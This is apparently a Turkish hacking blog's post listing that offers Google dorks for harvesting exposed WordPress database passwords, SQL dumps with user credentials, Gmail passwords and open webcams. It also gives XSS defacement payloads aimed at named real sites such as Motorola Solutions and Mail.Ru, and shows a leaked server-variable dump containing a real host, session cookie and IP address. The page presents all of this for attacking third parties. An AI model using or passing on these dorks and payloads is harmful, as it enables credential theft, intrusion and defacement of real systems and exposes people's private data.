Upload File Exploit

13:37 ---




intext:"Directory Listing of " Upload file filetype:php

AyyildizTim İstihbarat

Emp: http://link.tl/TcEL
Devamını Oku »

Showme.asp server bilgisi çekme http accept

07:56 ---



Google dork : intext:"/showme.asp" HTTP_ACCEPT

.asp sitelerin http_accept serv bilgilerini göstermektedir.

Görüldüğü gibi;
Server Variables:

ALL_HTTP: HTTP_CONNECTION:Keep-alive HTTP_VIA:1.1 Chrome-Compression-Proxy HTTP_ACCEPT:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 HTTP_ACCEPT_ENCODING:gzip, deflate, sdch HTTP_ACCEPT_LANGUAGE:tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4 HTTP_COOKIE:ASPSESSIONIDACDBTBTT=IEHEJDFAFFBMJLNJFAMAFAOB HTTP_HOST:www.dashkane.com HTTP_REFERER:https://www.google.com.tr/ HTTP_USER_AGENT:Mozilla/5.0 (Linux; Android 6.0.1; ASUS_Z00MD Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.81 Mobile Safari/537.36 HTTP_FORWARDED:for=5.46.120.217 HTTP_SAVE_DATA:on HTTP_SCHEME:http HTTP_UPGRADE_INSECURE_REQUESTS:1 HTTP_X_FORWARDED_FOR:5.46.120.217

ALL_RAW: Connection: Keep-alive Via: 1.1 Chrome-Compression-Proxy Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, sdch Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: ASPSESSIONIDACDBTBTT=IEHEJDFAFFBMJLNJFAMAFAOB Host: www.dashkane.com Referer: https://www.google.com.tr/ User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; ASUS_Z00MD Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.81 Mobile Safari/537.36 Forwarded: for=5.46.120.217 Save-Data: on Scheme: http Upgrade-Insecure-Requests: 1 X-Forwarded-For: 5.46.120.217

APPL_MD_PATH: /LM/W3SVC/357399558/ROOT

APPL_PHYSICAL_PATH: D:\hostinguk\sites\_domainholder\
Devamını Oku »

Motorola buss xss acigi 2016

07:41 ---





Google Dork : http://careers.motorolasolutions.com/



<img src= resimadresi><br><br>><font color=red size=250>hacked message</font>


Motorola Solutions XSS Vuln.
Devamını Oku »

server bilgisi çekme dork, server info backup database

04:07 ---




Google Dork : inurl:"trace" ext:axd intext:"password"

Server bilgisi ve serverdaki bilgileri göstermektedir ASP.NET ile birlikte.


Örnekte görüldüğü gibi bazı sitelerin bilgileri burada belirtilmekte;



Devamını Oku »

sql database exploit backup sql database dork

17:50 ---




Google Dork : ext:sql intext:username intext:password

aslında bu açık robots belirtilmeyen bir açık daha cok açarsak; robots.txt dosyasindaki examp; /admin/ google aramalarında gözükmediği gibi eğer bunu ftp sitenizdeki .sql dosyasi için uygulanırsa google aramalarında gözükmeyecektir.
Devamını Oku »

wordpress wp-config db password

17:44 ---



Google Dork : inurl:wp-config -intext:wp-config "'DB_PASSWORD'"

Bu açık ile wordpress' yedeklenen wp-config dosyasinin gösterilmesini sağlıyor....
Devamını Oku »

GameBase - Video Games Database Script Dork

14:41 ---



GameBase - Video Games Database Script
Cross-Site Scripting

Google Dork : http://codecanyon.net/item/gamebase-video-games-database/14197855?s_phrase=&s_rank=1

Demo :  http://codecanyon.net/item/gamebase-video-games-database/full_screen_preview/14197855



< -- bug code start -- >

><Script>alert(’XSS’);</Script>

< -- bug code end of -- >
Devamını Oku »

Mail.Ru XSS Vuln. Dork

14:36 ---



Exploit : Mail.Ru XSS Vuln

Google Dork : https://news.mail.ru/inregions/moscow/90/

Cross-Site Scripting

< ------------------- header data end of ------------------- >

< -- bug code start -- >


><h5><font color=red size=250>Hacked The vvv</font>

< -- / bug code end of -- >
Devamını Oku »

Online Kamera Dork

13:59 ---



Google Dork : inurl:top.htm inurl:currenttime

Online kamera dorku.

Örnek site : http://link.tl/Job6
Devamını Oku »

Phpmyadmin wpuser dork

13:04 ---



Google Dork : filetype:sql intext:wp_users phpmyadmin

Wordpress sitelerin SQL dökümü dosyaları bulur ve şifreler

The vvv
Devamını Oku »

DiGIR Exploit Dork

06:07 ---




Google Dork : inurl:DiGIR.php

SQL veritabanları için tanı sorunları içeren dosyalar bulur diğer şeylerin yanı sıra PHP kodu . Hata ile birlikte kullanılmak üzere edebilme göre SQLi ve güvenlik açığı numaralandırmaları gösterir.
Devamını Oku »

Gmail.com şifre bulma exploit

05:50 ---




Google Dork : site:static.ow.ly/docs/ intext:@gmail.com | Password

Bu Dork ile ".ow.ly" sıkıştırılmış docs belegeler içerisindeki şifreleri bulmanıza yardımcı olucaktır.


Exploit Shell - The vvv
Devamını Oku »